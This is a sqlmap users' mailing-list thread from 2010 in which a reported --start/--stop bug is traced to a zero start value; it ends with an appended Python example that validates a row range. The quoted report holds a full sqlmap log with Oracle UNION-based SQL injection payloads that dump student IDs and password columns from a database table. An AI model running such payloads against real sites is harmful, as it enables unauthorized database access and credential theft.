Re: [sqlmap-users] Bug(?) with --start/stop in oracle(maybe others)
From: Miroslav S. <mir...@gm...> - 2010-04-26 08:59:57
You've provided --start 0, while it needs to be >0. We'll add the proper warning for this into runtime.

Kind regards.

On Sat, Apr 24, 2010 at 4:02 AM, David Guimaraes <sk...@gm...> wrote:

> Syntax that had problems:
>
> $ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop 4 -v 2
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 22:52:50
>
> [22:52:50] [DEBUG] initializing the configuration
> [22:52:50] [DEBUG] initializing the knowledge base
> [22:52:50] [DEBUG] cleaning up configuration parameters
> [22:52:50] [DEBUG] setting the HTTP timeout
> [22:52:50] [DEBUG] setting the HTTP method to GET
> [22:52:50] [DEBUG] creating HTTP requests opener object
> [22:52:50] [DEBUG] parsing XML queries file
> [22:52:50] [INFO] using '/path/session' as session file
> [22:52:50] [INFO] resuming injection point 'GET' from session file
> [22:52:50] [INFO] resuming injection parameter 'a' from session file
> [22:52:50] [INFO] resuming injection type 'stringsingle' from session file
> [22:52:50] [INFO] resuming 0 number of parenthesis from session file
> [22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file
> [22:52:50] [INFO] resuming union comment '--' from session file
> [22:52:50] [INFO] resuming union count 15 from session file
> [22:52:50] [INFO] resuming union position 1 from session file
> [22:52:50] [INFO] resuming union false condition 1 from session file
> [22:52:50] [INFO] testing connection to the target url
> [22:52:50] [DEBUG] got HTTP error code: 500
> [22:52:50] [WARNING] the testable parameter 'a' you provided is not into the Cookie
> [22:52:50] [INFO] testing for parenthesis on injectable parameter
> [22:52:50] [DEBUG] skipping test for MySQL
> [22:52:50] [INFO] the back-end DBMS is Oracle
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Oracle
>
> [22:52:50] [WARNING] on Oracle it is only possible to enumerate if you provide a TABLESPACE_NAME as database name. sqlmap is going to use 'USERS' as database name
> [22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table 'ALU_ALUNOS' on database 'USERS'
> [22:52:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are in front of a partial inband sql injection
> [22:52:50] [INFO] read from file '/path': 344305
> [22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM ALU_ALUNOS-- AND 'RFOj'='RFOj
> [22:52:51] [DEBUG] performed 1 queries in 0 seconds
> [22:52:51] [INFO] the SQL query provided returns 344305 entries
> [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1-- AND 'qGli'='qGli
> [22:52:51] [DEBUG] performed 2 queries in 0 seconds
> [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=2-- AND 'EXyf'='EXyf
> [22:52:53] [DEBUG] performed 3 queries in 1 seconds
> [22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=3-- AND 'CLyw'='CLyw
> [22:52:56] [DEBUG] performed 4 queries in 2 seconds
> [22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=4-- AND 'nHQn'='nHQn
> [22:52:57] [DEBUG] performed 5 queries in 0 seconds
> [22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=5-- AND 'iNmX'='iNmX
> [22:52:58] [DEBUG] performed 6 queries in 1 seconds
> [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=6-- AND 'mVQM'='mVQM
> [22:52:58] [DEBUG] performed 7 queries in 0 seconds
> [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=7-- AND 'FuqF'='FuqF
> [22:52:59] [DEBUG] performed 8 queries in 0 seconds
> [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=8-- AND 'utPd'='utPd
> [22:53:01] [DEBUG] performed 9 queries in 2 seconds
> [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=9-- AND 'ilBw'='ilBw
> [22:53:03] [DEBUG] performed 10 queries in 2 seconds
> [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=10-- AND 'YxAK'='YxAK
> ^C
> [22:53:04] [ERROR] user aborted
>
> [*] shutting down at: 22:53:04
>
> As you can see, it will not stop consultation until the fourth, ignoring parameters passed in ("--start" and "--stop").
>
> I gave ctrl + c in the tenth query.
>
> Am I doing something wrong or is it anyway?
>
> $ svn info
> Path: .
> URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
> Repository Root: https://svn.sqlmap.org/sqlmap
> Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
> Revision: 1588
> Node Kind: directory
> Schedule: normal
> Last Changed Author: inquisb
> Last Changed Rev: 1588
> Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010)
>
> --
> David Gomes Guimarães
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
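The point of the exchange is that the row window is 1-based (the log's Oracle subquery numbers rows with ROWNUM, so there is no row 0) and that an out-of-range `--start` should be rejected up front rather than silently leaving the dump unbounded. The following is an added example, not sqlmap's own code and not the fix the reply promises: it shows the argument check and a fetch loop bounded by it, over a constructed in-memory table. The function names, the sample rows and the `fetch_one` callback are assumptions made for this illustration.

```python
"""Added example (not sqlmap's code): validate a 1-based --start/--stop
window and drive a row-fetch loop that cannot run past it.

Everything here is constructed for illustration: the table, the lookup
callback standing in for a per-row request, and the function names."""

from typing import Callable, Dict, List, Optional, Tuple


def validate_range(start: Optional[int], stop: Optional[int], count: int) -> Tuple[int, int]:
    """Return the inclusive 1-based window of row numbers to fetch.

    Rows are numbered the way the ROWNUM subquery in the report numbers
    them (first row is 1), so --start 0 names no row and is rejected
    instead of being treated as "unset". --stop is clamped to the row
    count obtained from the COUNT() query so no request is made for
    rows that do not exist.
    """
    first = 1 if start is None else start
    last = count if stop is None else stop
    if first < 1:
        raise ValueError("--start must be > 0 (row numbers are 1-based)")
    if last < first:
        raise ValueError("--stop must be >= --start")
    return first, min(last, count)


def fetch_rows(
    fetch_one: Callable[[int], Optional[Tuple[str, str]]],
    count: int,
    start: Optional[int] = None,
    stop: Optional[int] = None,
) -> List[Tuple[str, str]]:
    """Fetch one row per ROWNUM value, stopping at the validated --stop.

    fetch_one(n) stands in for the per-row request seen in the log
    ("... WHERE LIMIT=n"); in this example it is a local dictionary lookup.
    """
    first, last = validate_range(start, stop, count)
    rows: List[Tuple[str, str]] = []
    for rownum in range(first, last + 1):
        row = fetch_one(rownum)
        if row is None:  # defensive: the reported count and the table disagree
            break
        rows.append(row)
    return rows


# Constructed sample table: 10 rows of made-up (ALU_RA, ALU_SENHA) pairs.
SAMPLE_TABLE: Dict[int, Tuple[str, str]] = {
    n: (f"ra-{n:04d}", f"hash-{n:04d}") for n in range(1, 11)
}


def lookup(rownum: int) -> Optional[Tuple[str, str]]:
    """Local stand-in for fetching row number `rownum`."""
    return SAMPLE_TABLE.get(rownum)


def queries_issued(start: Optional[int], stop: Optional[int]) -> int:
    """Number of per-row requests the bounded loop makes for a window."""
    return len(fetch_rows(lookup, len(SAMPLE_TABLE), start, stop))


if __name__ == "__main__":
    print("rows 1..4   ->", queries_issued(1, 4))        # the intended 4-row window
    print("no window   ->", queries_issued(None, None))  # the whole table
    try:
        queries_issued(0, 4)  # the combination the report was run with
    except ValueError as exc:
        print("rejected    ->", exc)
```

With `--start 1 --stop 4` the loop issues exactly four requests; with `--start 0` it stops before the first request with a clear error, which is the behaviour the reply says a runtime warning will cover.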